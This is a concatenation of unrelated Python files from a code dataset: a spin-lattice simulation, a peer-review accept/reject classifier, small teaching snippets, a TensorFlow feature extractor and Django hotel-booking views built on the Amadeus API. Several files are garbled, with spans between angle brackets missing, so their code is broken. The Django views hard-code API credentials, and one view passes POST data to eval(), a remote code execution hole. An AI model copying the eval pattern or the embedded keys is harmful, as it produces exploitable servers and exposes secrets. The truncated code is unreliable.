N))\n Hxy_eb_arr = np.stack([h_eb_arr*np.cos(Exchange_angle_arr),h_eb_arr*np.sin(Exchange_angle_arr)], axis=0)\nelse:\n Hxy_eb_arr = np.stack([0*Sx, 0*Sy], axis=0)\n\n#================ Initialize variables of the simulation =======================================================\nITERATION = [] # np.zeros(its) # iterations\navg_Mx = []#np.zeros(its) # X-sublattice Order parameter\navg_My = []#np.zeros(its) # Y-sublattice Order parameter\nVtype1 = []\nVtype2 = []\nVtype3 = []\nVtype4 = []\nVtype10, Vtype11, Vtype20, Vtype21, Vtype22, Vtype23, Vtype30, Vtype31, Vtype32, Vtype33, Vtype34, Vtype35, Vtype36, Vtype37, Vtype40, Vtype41 = [],[],[],[],[],[],[],[],[],[],[],[],[],[],[],[]\n\n\n\nj=0 #iteration number\nITERATION.append(0)\n\n#======= Counting vertices ====================================================\nVertex = np.argwhere(S == 0)#[0]\nCl,Cr,Ct,Cd = 0,0,0,0\nV = np.zeros((M,N))\nVb = np.zeros((M,N))\nV1 = np.zeros((M,N))\nE1=0\nfor ze in Vertex:\n xi = ze[1]\n yi = ze[0]\n if (10:\n Exy[yi,xi], Ed[yi,xi], Ez[yi,xi], Ex[yi,xi], Eeb[yi,xi] = asi_energy(xi,yi,Sxy,M,N,H,C,dipolar_switch,exchange_switch,Exchange_Bias, Hxy_eb_arr) \n# (Exy[yi,xi], Ed[yi,xi], Ez[yi,xi], Ex[yi,xi], Eeb[yi,xi]) = asi_energy(i,j,Sxy,M,N,H,C,dipolar_switch,exchange_switch, Exchange_Bias, Hxy_eb_arr)\n # p = random.uniform(0, 1) \n if (Exy[yi,xi] >= 1*Ebxy[yi,xi]):# and np.exp((E)*b) > p): # dE = 2Ee Energy difference\n Sxy[:,yi,xi] = -1*Sxy[:,yi,xi]\n# else: # Thermal fluctuations\n# p = random.uniform(0, 1)\n# if(np.exp((E+E0)*b) > p): \n# Sxy[:,yi,xi] = -1*Sxy[:,yi,xi]\n if (Sxy[0,yi,xi] != 0): # x compoment\n if (02020):\n\tprint(\"ERROR : please provide a valid year in command line argument\")\n\texit()\n\nyear = str(year)\n\n\n#hyper-params\npaper_embed_dim = 768\nrev_embed_dim = 512\n \nbalance_factor = 1\n\nbatch_sz = 32 #keep it even\n \nlstm_base = 256\n\nnum_epochs = 20\nif len(sys.argv)>2:\n\tnum_epochs = int(sys.argv[2])\n \nhyper_factor_and_dropout = 0.7\ndropout = hyper_factor_and_dropout\n \nactivation_func = \"tanh\"\n\n\n\npaperEmbed = pd.read_csv(\"./DATA/data/EDATA\"+year+\".csv\")\npaperEmbed = paperEmbed[[\"col\"+str(i) for i in range(paper_embed_dim)]]\npaperEmbed = paperEmbed.values.tolist()\npaperEmbed = paperEmbed + [[0.0 for i in range(paper_embed_dim)]]\npaper_num_tokens = len(paperEmbed)\npaperMeta = pd.read_csv(\"./DATA/Dmeta\"+year+\".csv\")\npaperMeta = paperMeta[['paper-start' , 'paper-end']]\nscMeta = pd.read_csv(\"./DATA/PMETA\"+year+\"_SCSUMMA.csv\")\nscMeta = scMeta[['id' , 'section-start' , 'section-end']]\nprint(\"paper_num_tokens : \",paper_num_tokens)\n\n\nrevEmbed = pd.read_csv(\"./DATA/data/REV_USE\"+year+\".csv\")\nrevEmbed = revEmbed[[\"col\"+str(i) for i in range(rev_embed_dim)]]\nrevEmbed = revEmbed.values.tolist()\nrevEmbed = revEmbed + [[0.0 for i in range(rev_embed_dim)]]\nrev_num_tokens = len(revEmbed)\nrevMeta = pd.read_csv(\"./DATA/REV\"+year+\".csv\")\nrevMeta = revMeta[['rev-start' , 'rev-end']]\nabMeta = pd.read_csv(\"./DATA/AB\"+year+\".csv\")\nabMeta = abMeta[['id' , 'verdict', 'revMeta-start' , 'revMeta-end']]\nnum_samples = len(abMeta)\nprint(\"rev_num_tokens : \",rev_num_tokens)\n\n\nnum_samples = len(scMeta)\npids = []\nscid = {}\nfor i in range(num_samples):\n\tpids.append(str(scMeta['id'][i]))\n\tscid[str(scMeta['id'][i])] = i\npids.sort()\ndummy = []\nfor i in range(num_samples):\n\tj = scid[pids[i]]\n\tdummy.append([scMeta['id'][j] , scMeta['section-start'][j] , scMeta['section-end'][j]])\ndummy = pd.DataFrame(dummy)\ndummy.columns = ['id' , 
'section-start' , 'section-end']\nscMeta = dummy\n\t\nprint(\"paperMeta-revise...\\n\")\nnum_samples = len(abMeta)\npaperId = {}\nfor i in range(num_samples):\n\tpaperId[abMeta['id'][i]] = i\n\ndummy = []\nnf = num_samples - len(scMeta)\nnum_samples = len(scMeta)\nfor i in range(num_samples):\n\tidx = paperId[scMeta['id'][i]]\n\tdummy.append([abMeta[\"id\"][idx], abMeta[\"verdict\"][idx] , abMeta[\"revMeta-start\"][idx] , abMeta[\"revMeta-end\"][idx]])\ndummy = pd.DataFrame(dummy)\ndummy.columns = ['id' , 'verdict' , 'revMeta-start' , 'revMeta-end']\n\nabMeta = dummy\nnum_samples = len(abMeta)\ndummy = []\n\nprint(\"number of samples : \",num_samples)\n\npaper_mx_sections = 0\npaper_mx_snts = 0\nrev_mx_snts = 0\nnum_samples = len(scMeta)\nfor i in range(num_samples):\n\tpaper_mx_sections = max(paper_mx_sections , scMeta['section-end'][i]-scMeta['section-start'][i])\n\tfor j in range(scMeta['section-start'][i] , scMeta['section-end'][i]):\n\t\tpaper_mx_snts = max(paper_mx_snts , paperMeta['paper-end'][j]-paperMeta['paper-start'][j])\n\tfor j in range(abMeta['revMeta-start'][i] , abMeta['revMeta-end'][i]):\n\t\trev_mx_snts = max(rev_mx_snts , revMeta['rev-end'][j]-revMeta['rev-start'][j])\nprint(\"max sections , paper max sentences , review max sentences : \",paper_mx_sections ,\" : \",paper_mx_snts , \" : \",rev_mx_snts)\n\nxall = [i for i in range(num_samples)]\nyall = [float(abMeta['verdict'][i]) for i in range(num_samples)]\nxtr , xte , ytr , yte = train_test_split(xall,yall, test_size=0.25, random_state=seed, stratify=yall)\nteLen = len(yte)\ntrLen = len(ytr)\n\npaperTest = []\nrevTest = []\nYtest = []\nzeroSection = [(paper_num_tokens-1) for i in range(paper_mx_snts)]\n\nfor i in xte:\n\tpaperDummy = []\n\tfor j in range(scMeta['section-start'][i] , scMeta['section-end'][i]):\n\t\tdummy = []\n\t\tfor k in range(paperMeta['paper-start'][j] , paperMeta['paper-end'][j]):\n\t\t\tdummy.append(k)\n\t\ttimes = paper_mx_snts - (paperMeta['paper-end'][j] - paperMeta['paper-start'][j])\n\t\tfor t in range(times):\n\t\t\tdummy.append(paper_num_tokens-1)\n\t\tpaperDummy.append(dummy)\n\ttimes = paper_mx_sections - (scMeta['section-end'][i] - scMeta['section-start'][i])\n\tfor t in range(times):\n\t\tpaperDummy.append(zeroSection)\n\tpaperTest.append(paperDummy)\n\trevDummy = []\n\tfor j in range(abMeta['revMeta-start'][i] , abMeta['revMeta-end'][i]):\n\t\tdummy = []\n\t\tfor k in range(revMeta['rev-start'][j] , revMeta['rev-end'][j]):\n\t\t\tdummy.append(k)\n\t\ttimes = rev_mx_snts - (revMeta['rev-end'][j] - revMeta['rev-start'][j])\n\t\tfor t in range(times):\n\t\t\tdummy.append(rev_num_tokens-1)\n\t\trevDummy.append(dummy)\n\trevTest.append(revDummy)\n\nYtest = yte\nprint(\"Test-set length : \",teLen , \" : \",len(paperTest) , \" : \",len(revTest) , \" : \", len(Ytest))\n\n\ncnt = [[] , []]\nfor i in range(trLen):\n\tcnt[int(ytr[i])].append(xtr[i])\nprint(len(cnt[0]) , \" : \",len(cnt[1]))\nxtr = []\nytr = []\nflag = [0 , 0]\ntmp = [0 , 0]\nwhile (flag[0]tmp[i][0]:\n\t\t\typ=1\n\t\tif Ytest[i][1]>Ytest[i][0]:\n\t\t\tyt=1\n\t\tmat[yt][yp] += 1\n\t#\n\tprec = [mat[0][0]/max(1,mat[0][0]+mat[1][0]) , mat[1][1]/max(1,mat[1][1],mat[0][1])]\n\trec = [mat[0][0]/max(1,mat[0][0]+mat[0][1]) , mat[1][1]/max(1,mat[1][1]+mat[1][0])]\n\tf1 = [(2*prec[0]*rec[0])/max(0.001,prec[0]+rec[0]) , (2*prec[1]*rec[1])/max(0.001,prec[1]+rec[1])]\n\t#\n\tval = (mat[0][0]+mat[1][1])/teLen\n\t#\n\tif val>compare_val:\n\t\ty_predict = deepcopy(tmp)\n\t\tlos,acc = model.evaluate([paperTest , revTest] , Ytest, 
batch_size=batch_sz , verbose=0)\n\t\tcompare_val = val\n\nprint(\"test-set [ loss : \",los,\" , accuracy : \",acc,\" ]\")\n\nprint(\"confusion matrix..............\")\nyt = []\nyp = []\nmat = [[0,0],[0,0]]\nfor i in range(teLen):\n\tif y_predict[i][0]>=y_predict[i][1]:\n\t\typ.append(0)\n\telse:\n\t\typ.append(1)\n\tif Ytest[i][0]>=Ytest[i][1]:\n\t\tyt.append(0)\n\telse:\n\t\tyt.append(1)\n\tmat[yt[i]][yp[i]] += 1\nprint(\"confusion_matrix : \",mat)\nyp = np.asarray(yp).reshape(teLen)\nyt = np.asarray(yt).reshape(teLen)\nprint(metrics.classification_report(yt,yp))\n\ndef plot_conf_mat(cm , xlen, ylen , title=\"confusion matrix\", cmap = plt.cm.Blues):\n\tfig, ax = plot_confusion_matrix(conf_mat=cm, figsize=(2, 2) , cmap=cmap , colorbar=True , show_normed=True, show_absolute=False)\n\tplt.xlabel('Predicted Label', fontsize=10, labelpad=15)\n\tplt.ylabel('True Label', fontsize=10,labelpad=15)\n\tmarks = np.arange(2)\n\tlabel = [\"REJ\" , \"ACC\"]\n\tplt.xticks(marks, label)\n\tplt.yticks(marks, label)\n\tplt.title(title, fontsize=14 , pad=2)\n\tplt.show()\n\nconf_matrix = np.asarray(mat).reshape(2,2)\nplot_conf_mat(conf_matrix , 2, 2 , title=\"\")\n\n","sub_path":"model_PR.py","file_name":"model_PR.py","file_ext":"py","file_size_in_byte":14844,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"58"} +{"seq_id":"69832142","text":"class Dog:\n d_type = \"京巴\" #属性,类属性,类变量\n \n def sayhi(self): #方法,第一个参数必须是 self 代表实例本身\n print(\"Hello, my name is \",self.d_type)\n\n#实例化\nd = Dog() #生成了一个实例\nd2 = Dog() #可以生成多个实例\n\nd.sayhi() #实例,方法\nd2.sayhi()\n\nprint(d.d_type)\n\n","sub_path":"alex/类/类的基本语法.py","file_name":"类的基本语法.py","file_ext":"py","file_size_in_byte":338,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"58"} +{"seq_id":"570095124","text":"# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Thu Jul 18 20:07:00 2019\n\n@author: Nataly\n\"\"\"\nimport numpy as np\ndef contraste(img):\n im11 = img\n #arreglo = np.array(im11.size)\n #print(im11.size)\n #total = arreglo[0] * arreglo[1]\n arreglo=im11.shape\n #arreglo=list(arreglo)\n total = arreglo[0] * arreglo[1]\n i = 0\n suma = 0\n while i < arreglo[0]:\n j = 0\n while j < arreglo[1]:\n suma = suma + im11[i, j]\n j+=1 \n i+=1\n brillo = suma / total \n i = 0\n while i < arreglo[0]:\n j = 0\n while j < arreglo[1]:\n aux = im11[i, j] - brillo\n suma = suma + aux\n j+=1\n i+=1\n cont = suma * suma\n cont = np.sqrt(suma / total)\n contraste = cont\n #print(\"El contraste de la imagen es: \", contraste)\n return contraste\n\ndef brillo(img):\n im10 = img\n arreglo = np.array(im10.size)\n total = arreglo[0] * arreglo[1]\n i = 0\n suma = 0\n while i < im10.size[0]:\n j = 0\n while j < im10.size[1]:\n suma = suma + im10.getpixel((i, j))\n j+=1 \n i+=1\n brillo = suma / total \n brillo = int(brillo)\n #print(\"El brillo de la imagen es: \", brillo)\n\n","sub_path":"subDM/brilloContraste.py","file_name":"brilloContraste.py","file_ext":"py","file_size_in_byte":1241,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"58"} +{"seq_id":"513901315","text":"import os\n\nfrom setuptools import setup, find_packages\n\nhere = os.path.abspath(os.path.dirname(__file__))\n\nrequires = [\n 'pyramid',\n 'pyramid_mako',\n 'pyramid_debugtoolbar',\n 'pyramid_tm',\n 'SQLAlchemy',\n 'transaction',\n 'zope.sqlalchemy',\n 'waitress',\n]\n\ntests_require = [\n 'nose',\n 'mock'\n]\n\nmigrations_require = [\n 'alembic',\n]\n\nsetup(name='expenses',\n version='1.0.0',\n 
description='expenses',\n author='bruk habtu',\n author_email='bruk.habtu@beanfield.com',\n packages=find_packages(),\n include_package_data=True,\n zip_safe=False,\n extras_require={\n 'testing': tests_require,\n 'migrations': migrations_require,\n },\n install_requires=requires,\n entry_points=\"\"\"\n [paste.app_factory]\n main = expenses:main\n \"\"\",\n )\n","sub_path":"setup.py","file_name":"setup.py","file_ext":"py","file_size_in_byte":842,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"58"} +{"seq_id":"190828781","text":"from __future__ import absolute_import\nfrom __future__ import division\nfrom __future__ import print_function\nimport re\nimport cv2\nimport pdb\nimport tensorflow as tf\nimport argparse\nfrom skimage.transform import resize\nimport sys\nsys.path.insert(0, \"/home/hxw/frameworks/models/research/object_detection\")\nfrom utils import visualization_utils as vis_util\nimport numpy as np\nimport PIL.Image as Image\nimport PIL.ImageDraw as ImageDraw\nimport PIL.ImageFont as ImageFont\nfrom itertools import compress\nimport os.path\n\n\n# Path to frozen detection graph. This is the actual model that is used for the object detection.\nPATH_TO_CKPT_CLS = 'model/market/frozen_graph.pb'\nNUM_CLASSES = 2\n\ndef get_boxes_from_image(image, boxes):\n image_data = []\n h, w, _ = image.shape\n for box in boxes:\n x1 = max(int(box[0]), 0)\n y1 = max(int(box[1]), 0)\n x2 = min(int(x1 + box[2]), w)\n y2 = min(int(y1 + box[3]), h)\n image_data.append(((resize(image[y1:y2, x1:x2, :], (299, 299), preserve_range=True).astype(np.float32))/255-0.5)/2)\n return image_data\n\n\ndef extract_features(exp, startf=0, endf=100000, vis=False, fps=40.0):\n video_file = \"result/original/\" + exp + \".mp4\"\n person_track_file = 'result/tracking/' + exp + '_person.txt'\n bin_track_file = 'result/tracking/' + exp + '_bin.txt'\n\n capture = cv2.VideoCapture(video_file)\n capture.set(1, startf)\n fourcc = cv2.VideoWriter_fourcc(*'XVID')\n #out = cv2.VideoWriter('./result/tracking/' + exp + '_SORT_Tracking.avi', fourcc, fps, (1920, 1080))\n \n person_features_npy = './result/tracking/' + exp + '_features_person.npy'\n bin_features_npy = './result/tracking/' + exp + '_features_bin.npy'\n \n if os.path.isfile(person_track_file):\n person_boxes = np.loadtxt(person_track_file, delimiter=',')\n else:\n person_boxes = np.array([])\n\n if os.path.isfile(bin_track_file): \n bin_boxes = np.loadtxt(bin_track_file, delimiter=',')\n else:\n bin_boxes = np.array([])\n \n\n classification_graph = tf.Graph()\n with classification_graph.as_default():\n od_graph_def = tf.GraphDef()\n with tf.gfile.GFile(PATH_TO_CKPT_CLS, 'rb') as fid:\n serialized_graph = fid.read()\n od_graph_def.ParseFromString(serialized_graph)\n tf.import_graph_def(od_graph_def, name='')\n\n sess_cls = tf.Session(graph=classification_graph)\n\n i = startf - 1\n person_features = []\n bin_features = []\n\n while True:\n flag, frame = capture.read()\n if frame is not None:\n frame = frame[:,:,::-1]\n image = Image.fromarray(frame)\n i += 1\n else: break\n if i > endf: break\n \n if person_boxes.size > 0:\n curr_person_boxes = person_boxes[person_boxes[:,0] == i]\n else:\n curr_person_boxes = np.array([])\n if bin_boxes.size > 0: \n curr_bin_boxes = bin_boxes[bin_boxes[:,0] == i]\n else:\n curr_bin_boxes = np.array([]) \n\n if curr_person_boxes.size > 0:\n with classification_graph.as_default():\n image_data = get_boxes_from_image(np.squeeze(image), curr_person_boxes[:,2:])\n\n feature = classification_graph.get_tensor_by_name('InceptionV3/Logits/Dropout_1b/Identity:0')\n\n for sub_image, box in zip(image_data, curr_person_boxes[:,:2]):\n sub_image = sub_image[np.newaxis, :]\n curr_person_feature = sess_cls.run(feature,\n feed_dict={'Placeholder:0': sub_image})\n curr_person_feature = np.squeeze(curr_person_feature)\n person_features.append(np.concatenate([box.astype(np.float32), curr_person_feature]))\n\n if curr_bin_boxes.size > 0:\n with classification_graph.as_default():\n image_data = get_boxes_from_image(np.squeeze(image), curr_bin_boxes[:,2:])\n feature = classification_graph.get_tensor_by_name('InceptionV3/Logits/Dropout_1b/Identity:0')\n\n for sub_image, box in zip(image_data, curr_bin_boxes[:,:2]):\n sub_image = sub_image[np.newaxis, :]\n curr_bin_feature = sess_cls.run(feature,\n feed_dict={'Placeholder:0': sub_image})\n curr_bin_feature = np.squeeze(curr_bin_feature)\n bin_features.append(np.concatenate([box.astype(np.float32), curr_bin_feature]))\n \n print('%d frames processed!' % (i - startf + 1))\n\n\n np.save(person_features_npy, np.array(person_features))\n np.save(bin_features_npy, np.array(bin_features)) \n\ndef parse_args():\n \"\"\" Parse command line arguments.\n \"\"\"\n parser = argparse.ArgumentParser(description=\"Extract features\")\n parser.add_argument(\n \"--exp\", help=\"Name of video file\",\n default=None, required=True)\n return parser.parse_args()\n\n\nif __name__ == \"__main__\":\n args = parse_args()\n extract_features(args.exp)\n \n","sub_path":"mycore/extract_track_features.py","file_name":"extract_track_features.py","file_ext":"py","file_size_in_byte":5092,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"58"} +{"seq_id":"299182798","text":"# Create your views here.\n\nfrom amadeus import Client, ResponseError\nfrom django.shortcuts import render, redirect\nfrom sendgrid import SendGridAPIClient\nfrom sendgrid.helpers.mail import Mail\n\nfrom .models import Bookings\nimport requests\nfrom django.core.mail import send_mail\n\n# Create your views here.\namadeus = Client(\n client_id='itAu7wJi164TVE1xgGnQ1hDTnnL7jchA',\n client_secret='3LlE97fVMg7AaWqG',\n hostname='test'\n )\n\n\nourlist = []\n\n\ndef search(request):\n ourlist.clear()\n if request.method == \"POST\":\n citycode = request.POST.get('citycode', )\n checkindate = request.POST.get('checkindate', )\n checkoutdate = request.POST.get('checkoutdate', )\n\n # print(adults,children,rooms)\n destination = citycode.split()\n\n destination = destination[-1]\n\n try:\n # Get list of Hotels by city code\n hotels_by_city = amadeus.shopping.hotel_offers.get(cityCode=destination, checkInDate=checkindate,\n checkOutDate=checkoutdate)\n k = hotels_by_city.data\n # print('this is data' ,k)\n\n except ResponseError as error:\n print(error.description())\n\n else:\n hotelid = \"Not Availlable\"\n name = \"Not Availlable\"\n address = \"Not Availlable\"\n phone = \"Not Availlable\"\n fax = \"Not Availlable\"\n distancefromcenter = \"Not Availlable\"\n dunits = \"Not Availlable\"\n description = \"Not Availlable\"\n hrating = \"Not Availlable\"\n media = \"Not Availlable\"\n amenities = \"Not Availlable\"\n guests_adults = \"Not Availlable\"\n price_currency = \"Not Availlable\"\n price_total = \"Not Availlable\"\n cityname = \"Not Availlable\"\n\n for i in k:\n # print(i)\n hoteldata = i\n\n try:\n\n hotelid = hoteldata[\"hotel\"]['hotelId']\n\n except (KeyError, AttributeError, TypeError) as e:\n print(e)\n\n try:\n name = 
hoteldata[\"hotel\"]['name']\n\n except (KeyError, AttributeError, TypeError) as e:\n print(e)\n\n try:\n address = hoteldata[\"hotel\"]['address']['cityName']\n\n except (KeyError, AttributeError, TypeError) as e:\n print(e)\n\n try:\n phone = hoteldata[\"hotel\"]['contact']['phone']\n\n except (KeyError, AttributeError, TypeError) as e:\n print(e)\n\n try:\n fax = hoteldata[\"hotel\"]['contact']['fax']\n\n except (KeyError, AttributeError, TypeError) as e:\n print(e)\n\n try:\n distancefromcenter = hoteldata[\"hotel\"]['hotelDistance']['distance']\n\n except (KeyError, AttributeError, TypeError) as e:\n print(e)\n\n try:\n dunits = hoteldata[\"hotel\"]['hotelDistance']['distanceUnit']\n\n except (KeyError, AttributeError, TypeError) as e:\n print(e)\n\n try:\n description = hoteldata[\"hotel\"]['description']['text']\n\n except (KeyError, AttributeError, TypeError) as e:\n print(e)\n\n try:\n hrating = hoteldata[\"hotel\"]['rating']\n\n except (KeyError, AttributeError, TypeError) as e:\n print(e)\n\n try:\n media = hoteldata[\"hotel\"]['media'][0]['uri']\n\n except (KeyError, AttributeError, TypeError) as e:\n print(e)\n\n try:\n amenities = hoteldata[\"hotel\"]['amenities']\n\n\n except (KeyError, AttributeError, TypeError) as e:\n print(e)\n\n try:\n guests_adults = hoteldata['offers'][0]['guests']['adults']\n\n\n except (KeyError, AttributeError, TypeError) as e:\n print(e)\n\n try:\n price_total = hoteldata['offers'][0]['price']['total']\n\n\n except (KeyError, AttributeError, TypeError) as e:\n print(e)\n\n try:\n cityname = hoteldata[\"hotel\"]['address']['cityName']\n\n\n except (KeyError, AttributeError, TypeError) as e:\n print(e)\n\n try:\n price_currency = hoteldata['offers'][0]['price']['currency']\n\n\n\n except (KeyError, AttributeError, TypeError) as e:\n print(e)\n\n try:\n price_total = price_total = hoteldata['offers'][0]['price']['total']\n\n\n except (KeyError, AttributeError, TypeError) as e:\n print(e)\n\n amenitylist = []\n for i in amenities:\n i = str(i)\n i = i.lower()\n amenity = i.replace(\"_\", \" \")\n\n amenitylist.append(amenity)\n\n rating = {\n 'comment': 'good'\n }\n\n if hrating == '1':\n rating['comment'] = 'basic'\n elif hrating == '2':\n\n rating['comment'] = 'Fair'\n\n\n elif hrating == '3':\n rating['comment'] = 'Good'\n\n elif hrating == '4':\n\n rating['comment'] = 'Very Good'\n\n elif hrating == '5':\n rating['comment'] = 'Excellent'\n\n rating = rating['comment']\n # totalresults = ourlist.count()\n\n # currency_conversion\n # try:\n # local_currency = 'USD'\n #\n #\n #\n # url = f'https://free.currconv.com/api/v7/convert?q=EUR_{local_currency}&compact=ultra&apiKey=43dd6947aec7594b4e71'\n # params = {\n #\n # }\n #\n # r = requests.post(url, params=params)\n #\n # print(r.status_code)\n # print(r.json())\n #\n # except:\n # pass\n\n context = {\n\n 'hotelid': hotelid,\n 'name': name,\n 'address': address,\n 'phone': phone,\n 'fax': fax,\n 'distancefromcenter': distancefromcenter,\n 'dunits': dunits,\n 'description': description,\n 'hrating': hrating,\n 'media': media,\n 'rating': rating,\n 'amenitylist': amenitylist,\n # 'totalresults': totalresults,\n 'guests_adults': guests_adults,\n 'price_currency': price_currency,\n 'price_total': price_total,\n 'cityname': cityname,\n\n }\n\n ourlist.append(context)\n\n ourcontextdict = {\n 'ourlist': ourlist\n\n }\n\n return render(request, 'searchres.html', ourcontextdict)\n\n\n else:\n return redirect('/')\n\n\nhoteldetailslist = []\nammenities = []\n\n\ndef hoteldetails(request, hotelid):\n 
hoteldetailslist.clear()\n ammenities.clear()\n\n try:\n # Get list of offers for a specific hotel\n hotel_offers = amadeus.shopping.hotel_offers_by_hotel.get(hotelId=hotelid)\n # print('this are hotel offers',hotel_offers.data)\n\n k = hotel_offers.data\n\n\n except ResponseError as error:\n raise error\n\n\n else:\n\n if k == None:\n contextdict2 = {\n\n }\n\n else:\n\n offers = \"Not Availlable\"\n ammenitiesraw = \"Not Availlable\"\n media = \"Not Availlable\"\n cityname = \"Not Availlable\"\n hotelname = \"Not Availlable\"\n line = \"Not Availlable\"\n latitude = \"Not Availlable\"\n longitude = \"Not Availlable\"\n\n try:\n\n offers = k.get('offers')\n\n except (KeyError, AttributeError, TypeError) as e:\n print(e)\n\n try:\n\n ammenitiesraw = k.get('hotel', ).get('amenities', )\n\n except (KeyError, AttributeError, TypeError) as e:\n print(e)\n\n try:\n media = k.get('hotel', ).get('media', )[0].get('uri', )\n\n except (KeyError, AttributeError, TypeError) as e:\n print(e)\n\n try:\n cityname = k.get('hotel', ).get('address', ).get('cityName', )\n\n\n\n except (KeyError, AttributeError, TypeError) as e:\n print(e)\n\n try:\n hotelname = k.get('hotel', ).get('name', )\n\n\n\n except (KeyError, AttributeError, TypeError) as e:\n print(e)\n\n try:\n latitude = k.get('hotel', ).get('latitude', )\n\n\n\n\n except (KeyError, AttributeError, TypeError) as e:\n print(e)\n\n try:\n longitude = k.get('hotel', ).get('longitude', )\n\n\n except (KeyError, AttributeError, TypeError) as e:\n print(e)\n\n for i in ammenitiesraw:\n i = i.replace('_', ' ')\n ammenities.append(i)\n # print(i)\n\n for offer in offers:\n offer_id = \"Not availlable\"\n checkindate = \"Not availlable\"\n checkoutdate = \"Not availlable\"\n roomtype = \"Not availlable\"\n roomcategory = \"Not availlable\"\n beds = \"Not availlable\"\n bedtype = \"Not availlable\"\n description = \"Not availlable\"\n currency = \"Not availlable\"\n price = \"Not availlable\"\n guests = \"Not availlable\"\n\n try:\n\n offer_id = offer.get('id', )\n\n\n except (KeyError, AttributeError, TypeError) as e:\n print(e)\n\n try:\n checkindate = offer.get('checkInDate', )\n\n\n except (KeyError, AttributeError, TypeError) as e:\n print(e)\n\n try:\n checkoutdate = offer.get('checkOutDate', )\n\n\n\n except (KeyError, AttributeError, TypeError) as e:\n print(e)\n\n try:\n roomtype = offer.get('room', ).get('type', )\n\n\n\n except (KeyError, AttributeError, TypeError) as e:\n print(e)\n\n try:\n roomcategory = offer.get('room', ).get('typeEstimated', ).get('category', ).replace('_', ' ')\n\n\n\n\n except (KeyError, AttributeError, TypeError) as e:\n print(e)\n\n try:\n beds = offer.get('room', ).get('typeEstimated', ).get('beds', )\n\n\n\n\n except (KeyError, AttributeError, TypeError) as e:\n print(e)\n\n try:\n bedtype = offer.get('room', ).get('typeEstimated', ).get('bedType', )\n\n\n\n except (KeyError, AttributeError, TypeError) as e:\n print(e)\n\n try:\n description = offer.get('room', ).get('description', ).get('text', )\n\n\n\n except (KeyError, AttributeError, TypeError) as e:\n print(e)\n\n try:\n currency = offer.get('price', ).get('currency', )\n\n\n\n except (KeyError, AttributeError, TypeError) as e:\n print(e)\n\n try:\n price = offer.get('price', ).get('total', )\n\n except (KeyError, AttributeError, TypeError) as e:\n print(e)\n\n try:\n guests = offer.get('guests', ).get('adults', )\n\n\n\n\n except (KeyError, AttributeError, TypeError) as e:\n print(e)\n\n context = {\n\n 'offer_id': offer_id,\n 'checkindate': checkindate,\n 
'checkoutdate': checkoutdate,\n 'roomtype': roomtype,\n 'roomcategory': roomcategory,\n 'beds': beds,\n 'bedtype': bedtype,\n 'description': description,\n 'hotelid': hotelid,\n 'currency': currency,\n 'price': price,\n 'guests': guests,\n\n }\n\n hoteldetailslist.append(context)\n\n hoteldetails = k\n contextdict2 = {\n 'hoteldetailslist': hoteldetailslist,\n 'ammenities': ammenities,\n 'media': media,\n 'cityname': cityname,\n 'hotelname': hotelname,\n 'line': line,\n 'latitude': latitude,\n 'longitude': longitude,\n 'hoteldetails': hoteldetails,\n\n }\n\n return render(request, 'searchItem.html', contextdict2)\n\n\nhotelroom = []\n\n\ndef roomdetails(request, offer_id):\n if request.method == 'POST':\n hoteldetails = request.POST.get('hoteldetails')\n\n k = eval(hoteldetails)\n ammenitiesraw = \"Not Availlable\"\n media = \"Not Availlable\"\n cityname = \"Not Availlable\"\n hotelname = \"Not Availlable\"\n line = \"Not Availlable\"\n latitude = \"Not Availlable\"\n longitude = \"Not Availlable\"\n\n try:\n ammenitiesraw = k.get('hotel', ).get('amenities', )\n\n except (KeyError, AttributeError, TypeError) as e:\n print(e)\n\n try:\n media = k.get('hotel', ).get('media', )[0].get('uri', )\n\n except (KeyError, AttributeError, TypeError) as e:\n print(e)\n\n try:\n\n cityname = k.get('hotel', ).get('address', ).get('cityName', )\n\n except (KeyError, AttributeError, TypeError) as e:\n print(e)\n try:\n hotelname = k.get('hotel', ).get('name', )\n\n except (KeyError, AttributeError, TypeError) as e:\n print(e)\n\n try:\n line = k.get('hotel', ).get('address', ).get('lines', )[0]\n\n except (KeyError, AttributeError, TypeError) as e:\n print(e)\n\n try:\n latitude = k.get('hotel', ).get('latitude', )\n\n except (KeyError, AttributeError, TypeError) as e:\n print(e)\n try:\n longitude = k.get('hotel', ).get('longitude', )\n except (KeyError, AttributeError, TypeError) as e:\n print(e)\n\n try:\n # Confirm the availability of a specific offer\n offer_availability = amadeus.shopping.hotel_offer(offer_id).get()\n # print('this is offer availlability',offer_availability.data)\n k = offer_availability.data\n\n myconst = k\n\n except ResponseError as error:\n\n raise error\n\n else:\n\n offerid = \"Not availlable\"\n\n citycode = \"Not availlable\"\n countrycode = \"Not availlable\"\n availability = \"Not availlable\"\n roomtype = \"Not availlable\"\n roomcat = \"Not availlable\"\n bed = \"Not availlable\"\n bedtype = \"Not availlable\"\n checkindate = \"Not availlable\"\n checkout = \"Not availlable\"\n boardtype = \"Not availlable\"\n typeestimated = \"Not availlable\"\n description = \"Not availlable\"\n guests = \"Not availlable\"\n currency = \"Not availlable\"\n base = \"Not availlable\"\n total = \"Not availlable\"\n pricevariations = \"Not availlable\"\n creitcards = \"Not availlable\"\n acceptedPaymnts = \"Not availlable\"\n paymenttype = \"Not availlable\"\n checkinout = \"Not availlable\"\n cancellation = \"Not availlable\"\n try:\n offerid = myconst.get('offers', )[0].get('id', ),\n except (KeyError, AttributeError, TypeError) as e:\n print(e)\n\n try:\n citycode = myconst.get('hotel', ).get('cityCode', ),\n\n except (KeyError, AttributeError, TypeError) as e:\n print(e)\n\n try:\n countrycode = myconst.get('hotel', ).get('address', ),\n\n except (KeyError, AttributeError, TypeError) as e:\n print(e)\n try:\n availability = myconst.get('available', ),\n\n except (KeyError, AttributeError, TypeError) as e:\n print(e)\n try:\n roomtype = myconst.get('offers', )[0].get('room', 
